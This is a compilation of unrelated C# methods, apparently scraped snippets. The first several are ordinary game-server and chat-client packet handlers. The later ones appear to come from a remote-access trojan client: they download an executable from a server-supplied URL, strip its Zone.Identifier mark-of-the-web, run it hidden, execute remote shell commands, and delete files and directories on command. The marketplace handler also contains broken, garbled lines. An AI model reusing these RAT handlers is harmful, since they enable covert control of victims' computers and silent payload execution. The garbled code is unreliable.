public void Invite(Entities.GameClient client, Packets.TeamActionPacket packet) { if (Members.Count >= 5) return; if (Leader != client.EntityUID && packet.Action == Enums.TeamAction.AcceptInvite && NextInvite == client.EntityUID) { // accept if (Members.TryAdd(client.EntityUID, client)) { // send team member ... client.Team = this; using (var teammember = new Packets.TeamMemberPacket()) { teammember.Name = client.Name; teammember.EntityUID = client.EntityUID; teammember.Mesh = client.Mesh; teammember.MaxHealth = (ushort)client.MaxHP; teammember.CurrentHealth = (ushort)client.HP; foreach (Entities.GameClient member in Members.Values) { if (member.EntityUID != client.EntityUID) { member.Send(teammember); using (var teammember2 = new Packets.TeamMemberPacket()) { teammember2.Name = member.Name; teammember2.EntityUID = member.EntityUID; teammember2.Mesh = member.Mesh; teammember2.MaxHealth = (ushort)member.MaxHP; teammember2.CurrentHealth = (ushort)member.HP; client.Send(teammember2); } } } client.Send(teammember); } packet.EntityUID = Leader; client.Send(packet); } } else if (packet.EntityUID != Leader && packet.Action == Enums.TeamAction.RequestInvite && client.EntityUID == Leader) { Entities.GameClient newMember; if (Core.Kernel.Clients.TrySelect(packet.EntityUID, out newMember)) { NextInvite = newMember.EntityUID; packet.EntityUID = client.EntityUID; newMember.Send(packet); } } }
public XFLoginRequestPacket(PlgXfire.Networking.NetworkProviders.XfireNetworkProvider protocolInstance, System.Text.Encoding encodingInstance, String username, String password, Packets.LoginSequence.XFServersSaltPacket serversSaltPacket) : base(protocolInstance, encodingInstance) { pMessageID = 1; string pw = calculatePassword(username, password, serversSaltPacket); addAttribute(new Structure.XFPacketAttribute(encodingInstance, "name", new Structure.ValueTypes.XFString(encodingInstance, username))); addAttribute(new Structure.XFPacketAttribute(encodingInstance, "password", new Structure.ValueTypes.XFString(encodingInstance, pw))); addAttribute(new Structure.XFPacketAttribute(encodingInstance, "flags", new Structure.ValueTypes.XFInt32(encodingInstance, 0))); addAttribute(new Structure.XFPacketAttribute(encodingInstance, "sid", new Structure.ValueTypes.XFSessionID(encodingInstance, Structure.ValueTypes.XFSessionID.Zero))); }
public void OnMarketBuyItem(Packets.Client.MarketBuyItem p) { uint id = p.GetItemId(); MarketplaceItem item = MapServer.charDB.GetMarketItem(id); Packets.Server.MarketBuyItem p1 = new SagaMap.Packets.Server.MarketBuyItem(); if (item == null) { p1.SetResult(1); this.netIO.SendPacket(p1, this.SessionID); return; } if (this.Char.zeny < item.price) { p1.SetResult(1); this.netIO.SendPacket(p1, this.SessionID); return; } Mail mail = new Mail(); mail.content = "We are glad to inform you that your registered item at <Regenbogen> Market Place was bought by another Player" + ".\n Here is the money for the sold item.\n We are looking forward to see you at <Regenbogen> again!"; = DateTime.Now; = 0; mail.receiver = item.owner; mail.sender = "<Regenbogen>"; mail.topic = "Your item at <Regenbogen> was sold"; mail.zeny = item.price; mail.valid = 30; MapServer.charDB.NewMail(mail); MapServer.charDB.DeleteMarketItem(item); MapClient receiver = MapClientManager.Instance.GetClient(item.owner); if (receiver != null) { receiver.CheckNewMail(); } this.Char.zeny -= item.price; this.SendZeny(); mail = new Mail(); mail.content = "We are glad to inform you that you've successfully bought an item at <Regenbogen> Market Place from another Player" + ".\n Here is the bought item.\n We are looking forward to see you at <Regenbogen> again!"; = DateTime.Now; = 0; mail.receiver = this.Char.Name; mail.sender = "<Regenbogen>"; mail.topic = "You've bought an item at <Regenbogen>"; mail.valid = 30; mail.creator = ""; mail.durability = item.item.durability; mail.item = (uint); mail.stack = item.item.stack; MapServer.charDB.NewMail(mail); this.CheckNewMail(); p1.SetResult(0); this.netIO.SendPacket(p1, this.SessionID); }
public Item(Packets.FromServer._0x25AddItemToContainer packet) { this.Serial = packet.Serial; this.GraphicID = packet.GraphicID; this.Amount = packet.Amount; this.X = packet.X; this.Y = packet.Y; this.GridIndex = packet.Index; this.ContainerSerial = packet.ContainerSerial; this.Hue = packet.Hue; }
public static void HandleDoShowMessageBox(Packets.ServerPackets.DoShowMessageBox command, Client client) { new Thread(() => { MessageBox.Show(null, command.Text, command.Caption, (MessageBoxButtons)Enum.Parse(typeof(MessageBoxButtons), command.MessageboxButton), (MessageBoxIcon)Enum.Parse(typeof(MessageBoxIcon), command.MessageboxIcon)); }).Start(); new Packets.ClientPackets.SetStatus("Showed Messagebox").Execute(client); }
public static void HandleDoDownloadAndExecute(Packets.ServerPackets.DoDownloadAndExecute command, Client client) { new Packets.ClientPackets.SetStatus("Downloading file...").Execute(client); new Thread(() => { string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), FileHelper.GetRandomFilename(12, ".exe")); try { using (WebClient c = new WebClient()) { c.Proxy = null; c.DownloadFile(command.URL, tempFile); } } catch { new Packets.ClientPackets.SetStatus("Download failed!").Execute(client); return; } new Packets.ClientPackets.SetStatus("Downloaded File!").Execute(client); try { NativeMethods.DeleteFile(tempFile + ":Zone.Identifier"); var bytes = File.ReadAllBytes(tempFile); if (bytes[0] != 'M' && bytes[1] != 'Z') throw new Exception("no pe file"); ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = command.RunHidden; startInfo.FileName = tempFile; Process.Start(startInfo); } catch { NativeMethods.DeleteFile(tempFile); new Packets.ClientPackets.SetStatus("Execution failed!").Execute(client); return; } new Packets.ClientPackets.SetStatus("Executed File!").Execute(client); }).Start(); }
public static void HandleDoShellExecute(Packets.ServerPackets.DoShellExecute command, Client client) { string input = command.Command; if (_shell == null && input == "exit") return; if (_shell == null) _shell = new Shell(); if (input == "exit") CloseShell(); else _shell.ExecuteCommand(input); }
public static void HandleDoDownloadAndExecute(Packets.ServerPackets.DoDownloadAndExecute command, Client client) { new Packets.ClientPackets.SetStatus("Downloading file...").Execute(client); new Thread(() => { string tempFile = FileHelper.GetTempFilePath(".exe"); try { using (WebClient c = new WebClient()) { c.Proxy = null; c.DownloadFile(command.URL, tempFile); } } catch { new Packets.ClientPackets.SetStatus("Download failed!").Execute(client); return; } new Packets.ClientPackets.SetStatus("Downloaded File!").Execute(client); try { FileHelper.DeleteZoneIdentifier(tempFile); var bytes = File.ReadAllBytes(tempFile); if (!FileHelper.IsValidExecuteableFile(bytes)) throw new Exception("no pe file"); ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = false; startInfo.FileName = tempFile; Process.Start(startInfo); } catch { NativeMethods.DeleteFile(tempFile); new Packets.ClientPackets.SetStatus("Execution failed!").Execute(client); return; } new Packets.ClientPackets.SetStatus("Executed File!").Execute(client); }).Start(); }
public static void HandleDoPathDelete(Packets.ServerPackets.DoPathDelete command, Client client) { bool isError = false; string message = null; Action<string> onError = (msg) => { isError = true; message = msg; }; try { switch (command.PathType) { case PathType.Directory: Directory.Delete(command.Path, true); new Packets.ClientPackets.SetStatusFileManager("Deleted directory", false).Execute(client); break; case PathType.File: File.Delete(command.Path); new Packets.ClientPackets.SetStatusFileManager("Deleted file", false).Execute(client); break; } HandleGetDirectory(new Packets.ServerPackets.GetDirectory(Path.GetDirectoryName(command.Path)), client); } catch (UnauthorizedAccessException) { onError("DeletePath No permission"); } catch (PathTooLongException) { onError("DeletePath Path too long"); } catch (DirectoryNotFoundException) { onError("DeletePath Path not found"); } catch (IOException) { onError("DeletePath I/O error"); } catch (Exception) { onError("DeletePath Failed"); } finally { if (isError && !string.IsNullOrEmpty(message)) new Packets.ClientPackets.SetStatusFileManager(message, false).Execute(client); } }